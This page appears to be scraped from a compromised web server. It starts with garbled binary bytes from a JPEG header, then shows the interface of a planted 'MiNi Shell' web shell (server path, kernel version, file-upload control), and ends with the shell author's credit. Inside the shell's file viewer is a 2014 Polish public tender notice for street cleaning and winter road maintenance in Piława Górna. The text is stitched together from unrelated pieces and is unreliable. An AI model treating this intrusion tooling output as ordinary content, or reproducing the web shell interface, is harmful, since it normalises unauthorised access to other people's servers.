JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140128/30830-N-2014.html

<p class="kh_header"><b>Piława Górna: Część I.	Oczyszczanie ulic, chodników i placów w okresie:
od 16.03.2014 r. do 14.11.2014 r. oraz od 16.03.2015 r. do 14.11.2015 r.
Część II.	Zimowe utrzymanie ulic, chodników i placów w okresie:
od 15.11.2014 r. do 15.03.2015 r. oraz od 15.11.2015 r. do 15.03.2016 r</b><br>
<b>Numer ogłoszenia: 30830 - 2014; data zamieszczenia: 28.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Piława Górna , ul. Piastowska 29, 58-240 Piława Górna, woj. dolnośląskie, tel. 074 8324934, faks 074 8371386.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pilawagorna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Część I.	Oczyszczanie ulic, chodników i placów w okresie:
od 16.03.2014 r. do 14.11.2014 r. oraz od 16.03.2015 r. do 14.11.2015 r.
Część II.	Zimowe utrzymanie ulic, chodników i placów w okresie:
od 15.11.2014 r. do 15.03.2015 r. oraz od 15.11.2015 r. do 15.03.2016 r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie usług  polegających na oczyszczaniu miasta oraz zimowym utrzymaniu ulic, chodników i placów tj. ulice administrowane przez Gminę Piława Górna w ilości: 24 334,5 mb - 117 876 m2; 
w tym ulice które należy utrzymywać w stałej przejezdności - 3 275 mb - 11 068,5 m2. Przedmiot zamówienia składa się z dwóch części.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 90.61.10.00-3, 90.91.40.00-7, 90.51.13.00-5, 90.51.32.00-8, 90.62.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w  niniejszym postępowaniu nie będzie żądał wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunek udziału w postępowaniu składając oświadczenie o posiadaniu uprawnień do wykonywania określonej działalności lub czynności, jeżeli  przepisy prawa nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunek udziału w postępowaniu składając:
a)	dla Części I przedmiotu zamówienia - Oczyszczanie ulic, chodników i placów -  minimum 2 usługi o łącznej wartości nie mniejszej niż 100 000 zł brutto 
i/lub 
b)	dla Części II przedmiotu zamówienia - Zimowe utrzymanie ulic, chodników                 i placów - minimum 2 usługi o łącznej wartości nie mniejszej niż 100 000 zł brutto, lub
c)	dla Części I i Części II przedmiotu zamówienia jeżeli zakres świadczonych usług obejmuje łącznie letnie i zimowe utrzymanie dróg -  minimum 2 usługi o łącznej wartości nie mniejszej niż 200 000 zł brutto wykonanych lub wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania lub wykonywania oraz załączeniem dokumentów potwierdzających, że usługi zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunek udziału w postępowaniu jeżeli będzie dysponował, minimum, następującym sprzętem:
dla Części I
a)	zamiatarka do sprzątania ulic - 1 szt.;
b)	zamiatarka do sprzątania chodników - 1 szt.;
c)	pojazd umożliwiający wywóz zebranych odpadów - 1 szt.;
dla Części II
a)	pług lub inne urządzenie do odśnieżania ulic - 2 szt.;
b)	pług lub inne urządzenie do odśnieżania chodników - 1szt.;
c)	solarkopiaskarka - 2 szt.;
d)	pojazd umożliwiający wywóz zebranych odpadów oraz śniegu - 1 szt.;
e)	ładowarka do załadunku śniegu - 1 szt.;
f)	zamiatarka do sprzątania ulic - 1 szt. (w przypadku bezśnieżnej zimy lub po odwilży);
g)	zamiatarka do sprzątania chodników - 1 szt. (w przypadku bezśnieżnej zimy lub po odwilży).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunek udziału w postępowaniu składając oświadczenie o dysponowaniu osobami zdolnymi do wykonania przedmiotu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunek udziału w postępowaniu składając:
a)	opłaconą polisę a w przypadku jej braku, inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia.
b)	Oświadczenie, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie przedmiotu zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany formularz ofertowy przedstawiający ceny za wykonanie robót określonych w SIWZ - załącznik nr 1 do SIWZ
Zaakceptowany (zaparafowany) projekt umowy przez osobę upoważnioną do reprezentowania Wykonawcy dla Części I przedmiotu zamówienia - Oczyszczanie ulic, chodników i placów - załącznik nr 7 do SIWZ.
Zaakceptowany (zaparafowany) projekt umowy przez osobę upoważnioną do reprezentowania Wykonawcy dla Części II przedmiotu zamówienia - Zimowe utrzymanie ulic, chodników  i placów - załącznik nr 8 do SIWZ
W zależności od tego, czy Wykonawca składa ofertę na obie lub na jedną część przedmiotu zamówienia - załącza do oferty zaakceptowane oba lub jeden projekt umowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza w trybie art. 144 ustawy Pzp możliwość zmiany postanowień zawartej umowy w zakresie:
1)	zmiany okresu wykonania umowy, o którym mowa w § 6 Umowy w przypadku zaistnienia okoliczności niezależnych od Wykonawcy po ich uwzględnieniu przez Zamawiającego,  szczególnie w przypadku:
a)	jeżeli powstały opóźnienia, utrudnienia, zawieszenia robót lub przeszkody spowodowane przez, lub dające się przypisać, Zamawiającemu lub personelowi Zamawiającego, 
b)	siły wyższej,
c)	opadów śniegu lub powstania oblodzeń dróg i chodników wymagające podjęcia zimowego utrzymania dróg w okresie letniego utrzymania dróg; 
2)	zmiany zakresu rzeczowego robót wynikających z przyczyn nie leżących po stronie Zamawiającego i Wykonawcy i nie powodujące zmiany wysokości  wynagrodzenia Wykonawcy; 
3)	zmiany wynagrodzenia spowodowanego zmianą okresu wykonania umowy wymienionego w pkt.1);
4)	Zmiany warunków płatności wynikających z potrzeb Zamawiającego lub Wykonawcy i nie naruszających interesu Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pilawagorna.bip.ornak.pl/pl/bip/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Piławie Górnej
ul. Piastowska 29
58-240 Piława Górna
pok. nr 19 II p.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.02.2014 godzina 10:00, miejsce: Urząd Miasta w Piławie Górnej
ul. Piastowska 29
58-240 Piława Górna
pok. nr 19 II p.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I.	Oczyszczanie ulic, chodników i placów w okresie:
od 16.03.2014 r. do 14.11.2014 r. oraz od 16.03.2015 r. do 14.11.2015 r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I.	Oczyszczanie ulic, chodników i placów
1.	Oczyszczanie ulic i placów tj. usunięcie wszelkich zanieczyszczeń sypkich, odpadów,    liści, błota, ziemi przy użyciu zamiatarek mechanicznych (z funkcją polewania ulic). Oczyszczanie mechaniczne ulic nie może powodować utrudnień w ruchu Samochodowym i pieszym (sprzątanie winno odbywać się poza godzinami szczytu komunikacyjnego) oraz nie może być przyczyną skarg mieszkańców np. na pył i kurz unoszący się w powietrzu.
2.	Oczyszczanie  chodników  przy ulicach, (w tym: przystanków), parkingów i placów poprzez dokładne zamiatanie i zebranie występujących nieczystości (np. piasek. liście, kwiatostany) aż do całkowitego ich usunięcia, ręcznie lub przy użyciu przeznaczonych do tego celu zamiatarek  mechanicznych. Oczyszczanie mechaniczne chodników musi odbywać się      w taki sposób, aby nie powodowało utrudnień w ruchu pieszym i skarg mieszkańców np. na pył i kurz unoszący się w powietrzu.
3.	Usuwanie zanieczyszczeń uprzątniętych z chodników przez właścicieli nieruchomości.
4.	Wywóz nieczystości zebranych po wykonaniu prac do miejsc ich unieszkodliwienia oraz ewidencjonowanie wywożonych nieczystości.
5.	Wywóz nieczystości powstałych w trakcie wykonywania prac przez osoby zatrudnione w ramach prac interwencyjnych i robót publicznych w okresie trwania umowy, po uprzednim zgłoszeniu przez Zamawiającego. 
6.	Zbieranie zanieczyszczeń i koszenie poboczy, pasów zieleni i rowów przy drogach.
7.	Zbieranie i wywóz odpadów zgromadzonych w przeznaczonych do tego celu urządzeniach ustawionych na chodnikach (ul. Młynarskiej, ul. Piastowskiej, ul. Chrobrego), w tym również na przystankach autobusowych oraz utrzymanie tych urządzeń w odpowiednim stanie sanitarnym, porządkowym i technicznym (80 pojemników należy opróżniać 2 x w tygodniu).
8.	Utrzymanie wiat przystankowych w ilości 11 szt., w czystości poprzez co najmniej 7 - krotne  mycie  w ciągu roku. 
9.	Zbieranie z ulic, chodników i placów zwłok bezdomnych zwierząt i ich części oraz pozbywanie się ich. 
Usuwanie martwych zwierząt winno występować niezwłocznie, po wystąpieniu takiego faktu, postępując przy tym zgodnie z obowiązującymi przepisami w tym zakresie.
10.	Malowanie i naprawa ławek (20 szt.) i skrzyń drewnianych na piasek  (7 szt.) ustawionych na chodnikach i przy przystankach.
11.	Usuwanie odpadów powstałych na skutek wypadków i zjawisk atmosferycznych, w tym również usuwanie wiatrołomów i drzew uszkodzonych, stanowiących zagrożenie i przeszkody komunikacyjne (bezpośrednio po wystąpieniu zjawiska, w uzgodnieniu z Zamawiającym).
12.	Usuwanie plakatów, ulotek i ogłoszeń umieszczonych nielegalnie na obiektach infrastruktury miejskiej, w szczególności: słupach oświetleniowych i szafkach energetycznych, znakach drogowych itp. znajdujących się na terenach przewidzianych do sprzątania.
13.	Usuwanie większych odpadów z rzeki Piławy, w granicach administracyjnych miasta Piława Górna.
14.	Obsługę akcji: Sprzątanie Świata - usunięcie zebranych odpadów z wyznaczonych punktów miasta.
15.	Zapewnienie dodatkowego sprzątania w mieście przed uroczystościami i świętami, zgodnie z zaleceniem Zamawiającego.
Prace związane z utrzymaniem czystości należy wykonywać zgodnie z przepisami ustawy z dnia 13 września 1996 r.  o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2013, poz. 1399), ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz. U. z 2013 r. poz.  21) oraz ustawy z 21 marca 1985 r. o drogach publicznych (Dz. U. z 2007 r. Nr 19, poz. 115 ze zm.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 90.61.10.00-3, 90.91.40.00-7, 90.51.13.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II.	Zimowe utrzymanie ulic, chodników i placów w okresie:
od 15.11.2014 r. do 15.03.2015 r. oraz od 15.11.2015 r. do 15.03.2016.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II.	Zimowe utrzymanie ulic, chodników i placów
1.	Odśnieżanie 
Dopuszczalna jest cienka warstwa zajeżdżonego śniegu, nie utrudniającego poruszania się. Gołoledź (cienka warstwa lodowa o grubości do 1 mm) powinna znikać po trzech godzinach od momentu pojawienia się. 
2.	Likwidację śliskości (posypywanie dróg oraz chodników i placów na całej szerokości),
3.	Zapewnienie, aby części jezdni przy przejściach dla pieszych i przystankach autobusowych były w okresie mrozów i opadów śnieżnych oczyszczone ze śniegu i lodu - przez ich ręczne doczyszczenie, 
4.	Zbieranie i pozbywanie się śniegu, lodu oraz innych zanieczyszczeń z przystanków  komunikacyjnych, 
5.	Wywóz śniegu z ulic, placów  i chodników (w tym: uprzątniętego przez właścicieli nieruchomości), gdzie stanowiłby on przeszkodę dla ruchu ulicznego i pieszego - przejścia dla pieszych.
Uwaga. Śnieg nie może być gromadzony w pryzmach o wysokości większej niż 1 m. Stosy te nie mogą być przeszkodą dla ruchu oraz nie mogą zamykać dojazdu do nieruchomości, 
6.	Zapewnienie, aby części jezdni przy krawężnikach oraz studzienki kanalizacyjne były w okresie mrozów i opadów śnieżnych oczyszczone ze śniegu i lodu w stopniu umożliwiającym spływ z jezdni wody powstałej z topniejącego śniegu.
7.	Montaż, we wskazanych przez Zamawiającego miejscach, siatek przeciwśnieżnych przekazanych przez Zamawiającego w ilości ok. 400 mb oraz ich demontaż w terminie wskazanym przez Zamawiającego.
Jeżeli zima będzie bezśnieżna obowiązkiem firmy jest dokładne sprzątanie ulic, chodników i placów oraz wywóz  zebranych śmieci.

ZIMOWE UTRZYMANIE ULIC, CHODNIKÓW I PLACÓW

1.	Prowadzenie ZUD:
1)	zwalczanie gołoledzi, lodowicy, śliskości pośniegowej, szronu, szadzi przy użyciu materiałów naturalnych,
2)	odśnieżanie i uszorstnianie materiałami naturalnymi,
3)	zwalczanie śliskości materiałami uszorstniającymi z użyciem środków chemicznych (mieszanka 1:10).
2.	Kolejność i standardy zimowego utrzymania dróg. 
Jezdnie stanowiące przebieg ciągów ulicznych zostały podzielone na trzy kategorie tj. I, II i III.
Pierwsza (I) - część dróg lokalnych miejskich, stanowiąca podstawowy układ komunikacyjny miasta. 
Do odśnieżania i likwidacji śliskości należy przystąpić gdy warstwa śniegu przekroczy 3 cm. Odśnieżanie i posypywanie powinno być zakończone w ciągu 4 godzin po ustaniu opadów.
Druga (II) - część dróg lokalnych miejskich, stanowiących uzupełnienie układu podstawowego.
Do odśnieżania i likwidacji śliskości należy przystąpić po zakończeniu odśnieżania dróg I kolejności. Odśnieżanie i posypywanie powinno być zakończone w ciągu 6 godzin po ustaniu opadów.
Trzecia (III) - pozostałe drogi lokalne miejskie.
Do odśnieżania i likwidacji śliskości należy przystąpić po zakończeniu odśnieżania dróg II kolejności. Odśnieżanie i posypywanie powinno być zakończone w ciągu    8 godzin po ustaniu opadów.
Pozostałe gminne drogi  - należy utrzymywać w stałej przejezdności. 
3. Zwalczanie śliskości jezdni
1)	Przejazdy patrolowe wykonywane przez pługopiaskarki  i rozrzutniki połączone z uszorstnianiem nawierzchni jezdni w miejscach, gdzie wystąpiło zjawisko.
2)	Posypywanie mechaniczne naturalnym materiałem uszorstniającym.   
3)	Odśnieżanie jezdni po rozpoczęciu opadów (w miarę potrzeb połączone                               
          z uszorstnianiem).
4.	Utrzymywanie w czystości ulic, chodników i placów.
1)	Zbieranie i wywóz odpadów zgromadzonych w przeznaczonych do tego celu urządzeniach ustawionych na chodnikach (ul. Młynarskiej, ul. Piastowskiej, ul. Chrobrego), w tym również na przystankach autobusowych oraz utrzymanie tych urządzeń w odpowiednim stanie sanitarnym, porządkowym i technicznym (80 pojemników należy opróżniać 2 x w tygodniu).
2)	Zbieranie z ulic, chodników i placów zwłok bezdomnych zwierząt i ich części oraz pozbywanie się ich. Usuwanie martwych zwierząt winno występować niezwłocznie, po wystąpieniu takiego faktu, postępując przy tym zgodnie z obowiązującymi przepisami w tym zakresie.
3)	Usuwanie odpadów powstałych na skutek wypadków i zjawisk atmosferycznych, w tym również usuwanie wiatrołomów i drzew uszkodzonych, stanowiących zagrożenie i przeszkody komunikacyjne (bezpośrednio po wystąpieniu zjawiska, w uzgodnieniu z Zamawiającym).
Wymienione prace należy wykonywać zgodnie z przepisami ustawy z dnia 13 września 1996 r.  o utrzymaniu czystości i porządku w (t.j. Dz. U. z 2013, poz. 1399), ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz. U. z 2013 r. poz.  21).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com